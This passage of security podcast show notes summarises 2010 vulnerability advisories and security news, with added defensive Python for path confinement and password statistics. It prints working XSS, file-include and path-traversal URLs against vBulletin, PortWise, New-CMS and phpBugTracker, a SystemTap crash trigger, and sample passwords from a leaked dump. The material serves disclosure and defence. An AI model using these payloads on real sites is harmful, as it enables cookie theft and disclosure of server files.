            passwd = getpass.getpass()
        except KeyboardInterrupt:
            quit()

        login_info = (options.account, passwd)
        client.login(*login_info)
        try:
            MAINLOOP.run()
        except KeyboardInterrupt:
            quit()

  2. vBulletin is subject to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. These issues affect vBulletin 4.0.2; other versions may also be affected. Example URLs:
    http://www.sample.com/upload/calendar.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/faq.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/forum.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/usercp.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/subscription.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/showthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/showgroups.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/sendmessage.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/search.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/register.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/profile.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/private.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/online.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/newthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/misc.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/memberlist.php?=>"'><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/member.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/inlinemod.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/forumdisplay.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
  3. phpBugTracker is subject to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to view local files in the context of the webserver process, which may aid in further attacks. This issue affects phpBugTracker 1.0.1; other versions may be vulnerable as well. Example URL: http://www.sample.com/[path]/attachment.php?filename=./config.php
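The Libpurple emoticon request above, the phpBugTracker attachment filename, the vBseo parameter and the Scriptegrator files[] parameter in Episode 76 are all one defect: a user-supplied name reaches the filesystem without being confined to the directory it was meant for. As an added example, not code from any of those projects, here is a Python confinement check run over the requested paths quoted in those advisories; the directory names and function names are constructed for this example.

```python
import posixpath
from typing import Dict, Iterable, Optional

# Constructed directories for this example; not the real layout of
# libpurple, phpBugTracker or any other project named above.
EMOTICON_DIR = "/home/alice/.purple/custom_smiley"
ATTACHMENT_DIR = "/var/www/bugtracker/attachments"

# Requested paths quoted in the advisories, plus two well-formed requests.
SAMPLE_REQUESTS = [
    "../accounts.xml",   # Libpurple / Pidgin MSN emoticon request
    "/etc/passwd",       # Scriptegrator files[] parameter
    "./config.php",      # phpBugTracker attachment filename
    "smile.png",
    "sub/../smile.png",
]


def confine_path(base_dir: str, requested: str) -> Optional[str]:
    """Resolve `requested` under `base_dir`; return None if it would escape.

    The check is lexical (posixpath) so it is deterministic for the test
    below. A deployment should also os.path.realpath() the result so a
    symlink inside base_dir cannot point back out of it.
    """
    base = posixpath.normpath(base_dir)
    prefix = base if base.endswith("/") else base + "/"
    # NUL bytes truncate paths in C-based file APIs; never let one through.
    if "\x00" in requested:
        return None
    # Absolute requests are never legitimate for a relative-resource API.
    if posixpath.isabs(requested):
        return None
    candidate = posixpath.normpath(posixpath.join(base, requested))
    # Compare on a directory boundary: "/srv/app2" must not pass for "/srv/app",
    # and resolving to the base directory itself is not a file request.
    if not candidate.startswith(prefix):
        return None
    return candidate


def basename_only(requested: str) -> Optional[str]:
    """Stricter policy that fits the emoticon case: a custom smiley is one
    file in one directory, so any separator or dot-segment is rejected."""
    if not requested or "/" in requested or "\\" in requested or "\x00" in requested:
        return None
    if requested in (".", ".."):
        return None
    return requested


def triage(base_dir: str, requests: Iterable[str]) -> Dict[str, Optional[str]]:
    """Map each request to its confined path, or None when it was rejected;
    useful when reviewing request logs for traversal attempts."""
    return {r: confine_path(base_dir, r) for r in requests}


if __name__ == "__main__":
    for req, resolved in triage(EMOTICON_DIR, SAMPLE_REQUESTS).items():
        print("%-20s -> %s" % (req, resolved or "REJECTED"))
```

Note that "./config.php" is only dangerous when the attachment script resolves names relative to its own directory; confined to a dedicated attachment store it resolves to a harmless location, which is the point of the check.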

News Items of Interest:

News item 1:  http://www.allaboutjazz.com/php/news.php?id=50220

A band of hackers who were recently discovered hoarding a trove of account logons pilfered from thousands of companies worldwide are garden-variety cyberthieves. The gang most likely began by hiring spam specialists to send out e-mail and social-networking posts to lure recipients into clicking on a tainted Web link. They then used a dated free version of a hacking tool called ZeuS and did nothing to hide their tracks, indicating that “they’re probably amateurs.”

This underscores how deeply cybercriminals — from novices to elite gangs — have now saturated the Internet with infections that allow them to take full control of Windows PCs. Cybergangs slot newly infected PCs, called bots, into networks called botnets. On any given day, 12% to 15% of the 1.6 billion computers connected to the Internet are bots, according to security firm Damballa.

News item 2: http://www.suntimes.com/entertainment/music/2059068,freeallmusic-guvera-music-sites-022010.article

Two new companies are giving consumers a way to download songs for free by watching a few ads. The idea has been tried before but this time it appears it might work, because the startups have found advertisers that are willing to pay around $2 to have a moment of your time.
That means recording companies can get about as much compensation from the free services as they receive from a download on iTunes that costs the consumer $1.29.

“You pay for the song by paying attention to the advertiser,” said Richard Nailling, CEO of FreeAllMusic.com, which launched an invitation-only test of its service in December. “It’s a fair trade of attention for music.”

Both Free All Music and another new free site, Guvera.com, have licensing deals with independent labels and two of the largest recording companies, Universal Music Group and EMI Group PLC. Fans of U2, Black Eyed Peas and Norah Jones should be happy. But admirers of Ke$ha or Sade, both with Sony Music labels, will be out of luck for now.

The new services come after years of falling CD sales. More people are consuming music online but spending far less for it.

In response, recording companies have been licensing songs to an array of Internet businesses that offer songs cheaply or for free — in the hope that these legitimate alternatives can keep people from turning to illegal downloads.

News item 3:  http://www.acunetix.com/blog/websecuritynews/statistics-from-10000-leaked-hotmail-passwords/
An anonymous user posted usernames and passwords of over 10,000 Windows Live Hotmail accounts to a web site called PasteBin. PasteBin is currently down for maintenance but I managed to get a copy of the list, and quickly generated some statistics from these passwords.

Below are the statistics:

  • The list initially contained 10,028 entries.
  • After I cleaned up the list (removing entries without a password, for example), I had 9843 valid entries (passwords).
  • There are 8931 (90%) unique passwords in the list.
  • The longest password was 30 chars long: lafaroleratropezoooooooooooooo.
  • The shortest password was 1 char long : )

Top 20 most common passwords:

  1. 123456 – 64
  2. 123456789 – 18
  3. alejandra – 11
  4. 111111 – 10
  5. alberto – 9
  6. tequiero – 9
  7. alejandro – 9
  8. 12345678 – 9
  9. 1234567 – 8
  10. estrella – 7
  11. iloveyou – 7
  12. daniel – 7
  13. 000000 – 7
  14. roberto – 7
  15. 654321 – 6
  16. bonita – 6
  17. sebastian – 6
  18. beatriz – 6
  19. mariposa – 5
  20. america – 5

Based on these passwords I think the phishing kit was targeted towards the Latino community.

Password length distribution:

  • 1 chars – 2 – 0 %
  • 2 chars – 4 – 0 %
  • 3 chars – 4 – 0 %
  • 4 chars – 31 – 0 %
  • 5 chars – 49 – 1 %
  • 6 chars – 1946 – 22 %
  • 7 chars – 1254 – 14 %
  • 8 chars – 1838 – 21 %
  • 9 chars – 1091 – 12 %
  • 10 chars – 772 – 9 %
  • 11 chars – 527 – 6 %
  • 12 chars – 431 – 5 %
  • 13 chars – 290 – 3 %
  • 14 chars – 219 – 2 %
  • 15 chars – 157 – 2 %
  • 16 chars – 190 – 2 %
  • 17 chars – 56 – 1 %
  • 18 chars – 17 – 0 %
  • 19 chars – 7 – 0 %
  • 20 chars – 14 – 0 %
  • 21 chars – 10 – 0 %
  • 22 chars – 8 – 0 %
  • 23 chars – 3 – 0 %
  • 24 chars – 3 – 0 %
  • 25 chars – 3 – 0 %
  • 26 chars – 0 – 0 %
  • 27 chars – 3 – 0 %
  • 28 chars – 0 – 0 %
  • 29 chars – 1 – 0 %
  • 30 chars – 1 – 0 %

As you can see from the list above, most of the passwords are between 6 and 9 characters long.  Average password length is 8 characters.

What kind of passwords were in the list? :

  • 3,713 = 42 %; lower alpha passwords : passwords containing only characters from ‘a’ to ‘z’.
    Example : iloveyou
  • 291 = 3 %; mixed case alpha passwords : passwords containing  characters from ‘a’ to ‘z’ and from ‘A’ to ‘Z’.
    Example: ILoveYou
  • 1707 = 19 %; numeric passwords: passwords containing only numbers (‘0′ to ‘9′)
    Example: 123456
  • 2655 = 30 %; mixed alpha and numeric passwords: passwords containing characters from ‘a’-’z’, ‘A’-’Z’ and ‘0′-’9′.
    Example: Iloveyou12
  • 565 = 6 %; mixed alpha + numeric + other characters.
    Example: 1Love You$%@
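The statistics above can be reproduced on any password dump with a few lines of Python. The following is an added example, not the Acunetix author's script: it drops blank entries, counts the most common values over all valid entries, and computes the length distribution and the five character-class buckets over the unique passwords (which is how the per-length and per-class figures above add up to the 8,931 unique passwords). The input list is constructed for the example and the exact bucket rules for edge cases (all-uppercase, spaces) are this example's choice.

```python
import string
from collections import Counter

# Constructed stand-in for the leaked list: a few duplicates, two blank entries,
# and the one-character and thirty-character extremes from the write-up.
SAMPLE = [
    "123456", "123456", "123456", "alejandra", "alejandra", "123456789",
    "iloveyou", "ILoveYou", "Iloveyou12", "1Love You$%@", "tequiero",
    "", "   ", ")", "lafaroleratropez" + "o" * 14, "000000", "Daniel1",
]

LOWER = set(string.ascii_lowercase)
UPPER = set(string.ascii_uppercase)
DIGITS = set(string.digits)
CLASSES = ("lower-alpha", "mixed-case-alpha", "numeric", "alnum", "other")


def clean(entries):
    """Drop entries without a password (blank lines); keep the rest verbatim."""
    return [e for e in entries if e.strip()]


def classify(pw: str) -> str:
    """The five buckets used in the write-up. A letters-only password that is
    not all lowercase counts as mixed case (that also catches all-uppercase);
    anything with a character outside [A-Za-z0-9], spaces included, is 'other'."""
    chars = set(pw)
    if chars <= DIGITS:
        return "numeric"
    if chars <= LOWER:
        return "lower-alpha"
    if chars <= LOWER | UPPER:
        return "mixed-case-alpha"
    if chars <= LOWER | UPPER | DIGITS:
        return "alnum"
    return "other"


def summarize(entries, top_n=20):
    """Frequencies are counted over every valid entry; length distribution,
    class breakdown and average length are computed over unique passwords."""
    valid = clean(entries)
    unique = list(dict.fromkeys(valid))  # de-duplicate, keep first-seen order
    if not unique:
        raise ValueError("no passwords to summarise")
    lengths = Counter(len(p) for p in unique)
    classes = Counter(classify(p) for p in unique)

    def pct(count):
        return round(100 * count / len(unique))

    return {
        "total": len(entries),
        "valid": len(valid),
        "unique": len(unique),
        "top": Counter(valid).most_common(top_n),
        "lengths": {n: (c, pct(c)) for n, c in sorted(lengths.items())},
        "classes": {k: (classes[k], pct(classes[k])) for k in CLASSES},
        "avg_len": sum(map(len, unique)) / len(unique),
        "longest": max(unique, key=len),
        "shortest": min(unique, key=len),
    }


if __name__ == "__main__":
    s = summarize(SAMPLE, top_n=5)
    print(f"{s['total']} entries, {s['valid']} valid, {s['unique']} unique")
    for pw, n in s["top"]:
        print(f"  {pw} - {n}")
    for n, (c, p) in s["lengths"].items():
        print(f"  {n} chars - {c} - {p} %")
    for k, (c, p) in s["classes"].items():
        print(f"  {c} = {p} %; {k}")
    print(f"average length {s['avg_len']:.1f}, longest {s['longest']!r}, "
          f"shortest {s['shortest']!r}")
```

Counting the top list over all valid entries but the distributions over unique values is what makes "123456 – 64" and the per-length percentages consistent with each other; on a real dump, feed the file's lines in as the entries list and raise top_n to 20.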

News item 4: http://www.darkreading.com/security/attacks/showArticle.jhtml?articleID=223000208
Emerging botnet could redirect users to data-stealing sites, researchers say.  Czech security experts say they have uncovered a global botnet that may be redirecting Web surfers to other sites for the purpose of stealing their data.
Jan Vykopal, head of the security project of Masaryk University, told the Czech news agency CTK earlier this week that the Czech Defense Ministry discovered the botnet during a project called CYBER, in which several agencies have been researching ways to improve the country’s cyber defenses.

The botnet’s creators have dubbed the network “Chuck Norris” after the famous Hollywood actor and martial arts expert.

Researchers told the CTK that the botnet could allow operators to breach sensitive user data, such as access details for bank accounts, email boxes, passwords to various services, social networks, and other personal data.

The botnet could conceivably be used for attacks on well-secured servers, as well, Vykopal said, but the researchers are uncertain of how many devices it has marshaled.

News item 5: http://www.eweek.com/c/a/Security/FBI-Investigates-Webcam-Spy-Allegations-Against-School-451724/
The FBI is investigating allegations made against the Lower Merion School District in a lawsuit by the parents of a student. The lawsuit claims school officials used a remote-controlled Webcam to spy on their son, a high school student.

The FBI is reportedly investigating a Pennsylvania school district for possible federal law violations in light of a lawsuit filed by the parents of a high school student.

News item 6:  http://www.youtube.com/watch?v=QoqRR_J9ORc%20rel=
I have a lot of interest in the naughtiness of the web, and even if an attractive young woman going by the unusual name of “Numbers Anacker” (user id Man17782) has never posted a single item to my site, I might be likely to follow her. As would more and more folks (some of whom are following her back, presumably because they are intrigued by her photograph). As the following YouTube video demonstrates, this appears to be an attempt to get people to sign up for a website that offers to find adults new sexual partners.

News item 7: http://www.shadyurl.com/

Link shortening has become commonplace on services like Facebook and Twitter. Heck, even Google shortens URLs within its products now. People seem to be getting more used to the idea that shortened URLs, despite not showing you where they lead, are safe. Part of that is that the companies doing the shortening keep blacklists of sites with malware or spyware, to keep people from accidentally visiting sites that will do harm.

Newcomer ShadyURL makes no such claims though. This wonderfully satirical service turns even legitimate URLs into something that even the least tech-savvy friend or family member would know better than to click on. It inserts anything from what appear to be hijacking commands, to profanity and the names of well-known malware. In other words, whoever you send one of these links to is likely to say “there’s no way I’m clicking on that,” even though it’s likely to lead to a safe site.

Here are some of the gems it spit out on some common sites:

Facebook.com became: http://5z8.info/inject_worm_w0x6_open.exe
Twitter.com became: http://5z8.info/hack-outlook_z6t4_warez

2010
02.19

InfoSec Daily Podcast

 
ISD Podcast Episode 71 for February 19, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com will be putting on their SANS version of the Data Recovery Class in Orlando at SANS 2010 March 8th to 12th. https://www.sans.org/registration/register.php?conferenceid=2191

Data Recovery Class April 12th to the 16th in Washington DC; go to MyHardDriveDied.com or email smoulton at nicservices dot com for more information.

The next dc404 meeting is THIS Saturday, February 20th, at 2pm at the Vortex Midtown.   This month’s topic is “Social Engineering,” and Beau W. will be presenting. We hope to see a big group on Saturday!

March 15 – 20, 2010 SANS Audit 507: Auditing Networks, Perimeter and Systems  (http://www.sans.org/atlanta-auditing-networks-perimeters-2010-cs)

April 15 – 21, 2010  SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression (TM) (http://www.sans.org/atlanta-security-leadership-2010-cs)

May 17 – 21, 2010  SANS Security 566:  Implementing and Auditing the Twenty Critical Security Controls – In Depth  (http://www.sans.org/atlanta-critical-controls-2010-cs)

Vulnerabilities of Interest:

  1. SystemTap is subject to multiple local memory-corruption vulnerabilities. An attacker may exploit these issues to execute arbitrary code with superuser privileges. Failed exploit attempts will result in a denial of service. SystemTap 1.1 is vulnerable; other versions may also be affected. Proof-of-concept trigger:
    #!/bin/bash
    # Loop forever: each pass expands a large glob into a very long argument
    # list for /bin/echo and then dumps the kernel slab allocator statistics.
    while true ; do
        HOME=1
        /bin/echo /usr/src/kernels/2.6.18-128.el5-PAE-i686/include/*/*
        cat /proc/slabinfo
    done

  2. New-CMS is subject to multiple local file-include vulnerabilities and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit the local file-include vulnerabilities using directory-traversal strings to view and execute a crafted ‘cmd.php’ script within the context of the webserver process. Information harvested may aid in further attacks. The attacker may leverage the HTML-injection issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. New-CMS 1.08 is vulnerable; other versions may also be affected. Example URLs:
    http://www.sample.com/pdf.php?lng=cmd.php
    http://www.sample.com/newcms/struttura/manager.php?lng=cmd.php
    http://www.sample.com/newcms/struttura/editor/quote.php?lng=cmd.php

  3. OCS Inventory NG is subject to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The issues affect versions 1.02.3, 1.3.0 and 1.3.1. Other versions may also be affected. To exploit these issues, an attacker must entice an unsuspecting victim into following a malicious URI.
  4. PortWise SSL VPN is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.  An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. PortWise SSL VPN 4.6 is vulnerable; other versions may also be affected.  Exploit code is available:  https://www.sample.com/wa/auth?&authmech=Assess&reloadFrame=%22;%3Cscript%3Eblah%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
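The New-CMS ?lng=cmd.php URLs in item 2 above and the phpBugTracker attachment.php?filename=./config.php item in the February 26 notes are the same class of bug: a client-supplied name is joined onto a directory and then read or included. The following Python is an added example, not code from either project, showing the unsafe join, a canonicalise-and-contain check, why that check alone does not stop ./config.php when the base directory is the application root, and the allowlist shape that is the only safe answer for include-by-parameter. The directory names, the language map and the file names are assumptions made for the example.

```python
import posixpath
import re

# Assumed layout for the example, not taken from phpBugTracker or New-CMS.
APP_ROOT = "/var/www/app"                        # where config.php would live
ATTACHMENT_DIR = "/var/www/app-data/attachments"  # attachments only, outside the web root
LANGUAGE_FILES = {"en": "lang/en.php", "it": "lang/it.php"}  # allowlist for ?lng=

# Exactly one path component: no slash or backslash, no leading dot, no NUL.
# This refuses "./config.php", "../x" and "config.php\0.txt" alike.
_SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")


def vulnerable_path(base: str, filename: str) -> str:
    """What a handler like attachment.php?filename=... effectively does:
    join the client value onto a directory and open whatever results."""
    return posixpath.normpath(posixpath.join(base, filename))


def contain(base: str, user_path: str):
    """Canonicalise and keep only paths that stay under base (absolute).
    Returns the normalised path, or None when it escapes."""
    base = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base, user_path))
    if posixpath.commonpath([base, candidate]) != base:
        return None
    return candidate


def safe_attachment_path(filename: str):
    """Attachment names are a single component inside a directory that holds
    nothing but attachments, so even a name that passes containment cannot
    reach application files. Rejected names return None."""
    if not _SAFE_NAME.fullmatch(filename):
        return None
    return contain(ATTACHMENT_DIR, filename)


def language_file(lng: str):
    """For include-by-parameter like pdf.php?lng=...: map a short key to a
    known file and never include a name the client supplied."""
    return LANGUAGE_FILES.get(lng)


if __name__ == "__main__":
    print("unsafe  ./config.php     ->", vulnerable_path(APP_ROOT, "./config.php"))
    print("contain ./config.php     ->", contain(APP_ROOT, "./config.php"))
    print("contain ../../etc/passwd ->", contain(APP_ROOT, "../../etc/passwd"))
    print("safe    ./config.php     ->", safe_attachment_path("./config.php"))
    print("safe    report.txt       ->", safe_attachment_path("report.txt"))
    print("lng     cmd.php          ->", language_file("cmd.php"))
```

contain() is the right check when a path may legitimately contain subdirectories, but the phpBugTracker payload shows its limit: ./config.php never leaves the base directory, so the fix there is a single-component name in a directory that holds only attachments (better still, look the stored name up by attachment id and never accept a name at all). For include() targets the only safe shape is a fixed map from key to file, which is what language_file() does.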

News Items of Interest:

News item 1:  http://www.informationweek.com/news/government/security/showArticle.jhtml?articleID=222900539
The Department of Defense has signaled its intention to develop new policies requiring its vendors to meet increased standards for cybersecurity for unclassified military information residing on or being carried over private sector systems and networks.

In a memo issued in late January, Department of Defense chief information officer Cheryl Roby laid out a number of leadership responsibilities and strategic guidance on the development of stronger cybersecurity plans.

“It is DoD policy to establish a comprehensive approach for protecting unclassified DoD information transiting or residing on unclassified [Defense industrial base] systems and networks and create a timely, coordinated, and effective partnership with the [Defense industrial base],” Roby wrote.

News item 2: http://www.krebsonsecurity.com/2010/02/hackers-steal-150000-from-mich-insurance-firm/

An insurance firm in Michigan lost nearly $150,000 this month as a result of a single computer virus infection.

Port Austin, Mich. based United Shortline Insurance Service Inc., an insurance provider serving the railroad industry, discovered on Feb. 5 that the computer used by their firm’s controller was behaving oddly and would not respond. The company’s computer technician scoured the system with multiple security tools, and found it had been invaded by “ZeuS,” a highly sophisticated banking Trojan that steals passwords and allows criminals to control infected hosts remotely.

The following Monday, Feb. 8, United Shortline received a call from the Tinker Federal Credit Union at Tinker Air Force Base in Oklahoma, inquiring about a suspicious funds transfer one of its customers had received for slightly less than $10,000.

After that call, United Shortline President Louis M. Schillinger said the firm found 14 other such unauthorized transfers had been made from the company’s account to individuals across the United States who had no prior business with Shortline.

News item 3: http://www.computerworld.com/s/article/9157098/Hackers_at_Pwn2Own_to_compete_for_100K_in_prizes?taxonomyId=17

Pwn2Own contest next month will award cash prizes of $15,000 to anyone who can break into an iPhone, BlackBerry Bold, Droid or Nokia smartphone.

The prizes are 50% more than the top awards given last year at Pwn2Own, which will kick off March 24 at the CanSecWest security conference in Vancouver, British Columbia. Altogether, $100,000 could be handed out by 3Com TippingPoint, the contest sponsor.

Pwn2Own will again offer a dual-track challenge with both browser and mobile OS targets, said Aaron Portnoy, a TippingPoint security research team lead, on a company blog that announced details of this year’s contest.

Now in its fourth year, Pwn2Own has repeatedly made headlines for hacks of Apple’s Mac OS X and Microsoft’s Internet Explorer. In 2009, for example, researcher Charlie Miller broke into a Mac in less than five seconds to win $5,000.

News item 4: http://news.techworld.com/security/3213110/billboard-porn-hacker-busted/
When a Russian hacker last month broke into a giant video advertising billboard located in Moscow to run a pornographic film on it, it caused chaos in city traffic. But Russian news sources report police in the southern city of Novorossiisk have arrested the suspected billboard hacker.

Though not identifying him by name, a statement from the Interior Ministry’s high-tech crime unit says the suspected billboard hacker is a 41-year-old unemployed man who police believe used the IP address of an organisation based in Chechnya to breach a Moscow server in order to upload his pornographic video, according to The Moscow Times.

News item 5: http://www.eweek.com/c/a/Security/Researcher-Uncovers-eBay-Security-Vulnerabilities-684970/
eBay is working to patch a cross-site request forgery vulnerability recently uncovered by a security researcher. The Avnet researcher also discovered cross-site scripting and blind SQL injection bugs in eBay’s online auction site, which eBay has fixed.

eBay is working on a fix for a cross-site request forgery problem that could allow an attacker to change a user’s password and get access to that user’s account.

News item 6: http://www.msnbc.msn.com/id/35456838/ns/technology_and_science-security/
A computer botnet is known to have breached almost 75,000 computers in 2,500 organizations around the world, including user accounts of popular social network Web sites, according to Internet security firm NetWitness. The “Kneber botnet,” as it’s known, gathers login credentials to online financial systems, social networking sites and e-mail systems from infested computers and reports the information back to hackers.

News item 7: http://www.computerworld.com/s/article/9159278/Pa._school_district_denies_spying_on_students_with_MacBooks?source=rss_news

A suburban Philadelphia school district remotely activates the cameras in school-provided laptops to spy on students in their homes, a lawsuit filed in federal court Tuesday alleged.

According to the lawsuit filed by a high school student and his parents, the school has spied on students and families by “indiscriminate use of and ability to remotely activate the webcams incorporated into each laptop issued to students by the School District.”

Approximately 1,800 students at the district’s two high schools have been given laptops as part of a state- and federally-funded “one-to-one” student-to-laptop initiative.

News item 8: http://www.computerworld.com/s/article/9159258/Chinese_school_linked_to_Google_attacks_also_linked_to_01_attacks_on_White_House_site
One of two Chinese academic institutions identified in a New York Times report Thursday as the apparent source of the recent attacks against Google has also been linked to a hacker who may have been involved with the takedown of whitehouse.gov in 2001.

The Times yesterday reported that the recent cyberattacks against Google and more than 30 other organizations appeared to have originated from computers at two schools in China. One of the schools was identified as the Shanghai Jiaotong University; the other, as the Lanxiang Vocational School, an academic institution in China’s Shandong Province with apparent ties to the country’s military.

News item 9: http://www.theregister.co.uk/2010/02/18/firefox_zero_day_report/

A Russian security researcher on Thursday said he has released attack code that exploits a critical vulnerability in the latest version of Mozilla’s Firefox browser.

The exploit – which allows attackers to remotely execute malicious code on end user PCs – triggers a heap corruption vulnerability in the popular open-source browser, said Evgeny Legerov, founder of Moscow-based Intevydis. He recently added it as a module to Vulndisco, an add-on to the Immunity Canvas automated exploitation system sold to security professionals.

News item 10:  http://www.wired.com/dangerroom/2010/02/hackers-troops-rejoice-pentagon-lifts-thumb-drive-ban/

U.S. Strategic Command has lifted its ban on the tiny drives, memory sticks, CDs and other “removable flash media” on military networks.

The repeal, first reported by InsideDefense.com, may be good news for troops, who depend on the drives to move data in bandwidth-starved locations. But it may be good news for hackers, too. The original network security concerns which prompted the ban haven’t really been addressed, one Strategic Command cyber defense specialist tells Danger Room: “Not much changed. StratCom simply does not have the support to enforce such a ban indefinitely.”

StratCom prohibited the drives’ use back in November 2008 after the Agent.btz virus began working its way through military networks. A variation of the “SillyFDC” worm, Agent.btz spreads by copying itself from thumb drive to computer and back again. Once on a PC, “it automatically downloads code from another location. And that code could be pretty much anything,” iDefense computer security expert Ryan Olson said at the time.

News item 11: http://www.eweek.com/c/a/Security/Google-Patches-Buzz-Security-Vulnerability-471810/

Google has fixed a cross-site scripting bug that allowed attackers to take control of Google Buzz accounts. The bug affects the mobile version of Buzz and was reported Feb. 16 by SecTheory CEO Robert Hansen. Google patched the vulnerability the same day. According to Hansen, news of the flaw was passed along to him by a hacker with the moniker of TrainReq.

“There [are] four things of note here,” Hansen blogged. “Firstly, it’s on Google’s domain, not some other domain like Google Gadgets or something. So, yes, it’s bad for phishing and for cookies. Secondly, it’s over SSL/TLS [Secure Sockets Layer/Transport Layer Security] (so no one should be able to see what’s going on, right?). Third, it could be used to hijack Google Buzz—as if anyone is using that product (or at least you shouldn’t be). And lastly, isn’t it ironic that Google is asking to know where I am on the very same page that’s being compromised?”

News item 12: http://www.scientificamerican.com/article.cfm?id=flattery-will-get-you-far&sc=MND_20100216
Research by Elaine Chan and Jaideep Sengupta at the Hong Kong University of Science and Technology, first reported in the Journal of Marketing Research, showed that while most people can spot obvious flattery and attempts to influence them, on an innate, subconscious level it actually works!

The study showed that while participants’ explicit attitudes rejected marketing come-ons, their implicit attitudes were more positive and could be used to predict future behavior. This susceptibility to flattery may stem from the basic human need to feel good about oneself, related to what is known as illusory superiority or the above-average effect.

In testing whether or not the motive to self-enhance was related to insincere flattery, the researchers showed that, in the words of Scientific American, “those of us who could use a little pick-me-up to begin with are particularly vulnerable to the message behind a smooth sales pitch”.

So, how does this relate to information security and why is it important? This all goes back to social engineering and the ability to market to or convince other people to do what you want them to. Knowledge of these behavioral responses can be applied to social engineering as part of penetration testing and taught as part of security awareness training. Conversely, expect to see it used in phishing attempts.

2010
02.18

InfoSec Daily Podcast

 
ISD Podcast Episode 70 for February 18, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com will be putting on their SANS version of the Data Recovery Class in Orlando at SANS 2010 March 8th to 12th. https://www.sans.org/registration/register.php?conferenceid=2191

Data Recovery Class April 12th to the 16th in Washington DC; go to MyHardDriveDied.com or email smoulton at nicservices dot com for more information.

The next dc404 meeting is THIS Saturday, February 20th, at 2pm at the Vortex Midtown.   This month’s topic is “Social Engineering,” and Beau W. will be presenting. We hope to see a big group on Saturday!

March 15 – 20, 2010 SANS Audit 507: Auditing Networks, Perimeter and Systems  (http://www.sans.org/atlanta-auditing-networks-perimeters-2010-cs)

April 15 – 21, 2010  SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression (TM) (http://www.sans.org/atlanta-security-leadership-2010-cs)

May 17 – 21, 2010  SANS Security 566:  Implementing and Auditing the Twenty Critical Security Controls – In Depth  (http://www.sans.org/atlanta-critical-controls-2010-cs)

Vulnerabilities of Interest:

  1. Mozilla Firefox and SeaMonkey are subject to a cross-domain scripting vulnerability because they fail to properly sanitize user-supplied input.
    An attacker can exploit this issue to execute arbitrary code in the context of a different domain. Successful exploits may result in privilege escalation. Versions prior to the following are vulnerable: Firefox 3.6, Firefox 3.5.8, Firefox 3.0.18 and SeaMonkey 2.0.3. Other versions may also be affected. All that an attacker has to do to exploit this vulnerability is lure an unsuspecting victim to a malicious URL.
  2. Mozilla Firefox and SeaMonkey are subject to a cross-domain scripting vulnerability because they fail to properly handle SVG documents referenced via the ‘embed’ tag.  Attackers may leverage this issue to execute arbitrary script code within the context of targeted sites; this may allow the attacker to steal cookie-based authentication credentials or to launch other attacks. All that an attacker has to do to exploit this vulnerability is lure an unsuspecting victim to a malicious URL.
  3. The iTweak Upload module for Drupal is subject to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
    Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
    To exploit this issue, the attacker must have permissions to create content and upload files. The following are vulnerable: iTweak Upload 6.x-1.x (prior to 6.x-1.2) and iTweak Upload 6.x-2.x (prior to 6.x-2.3). Once the injected content is stored, a victim only has to view the affected page for the attacker’s script to run.
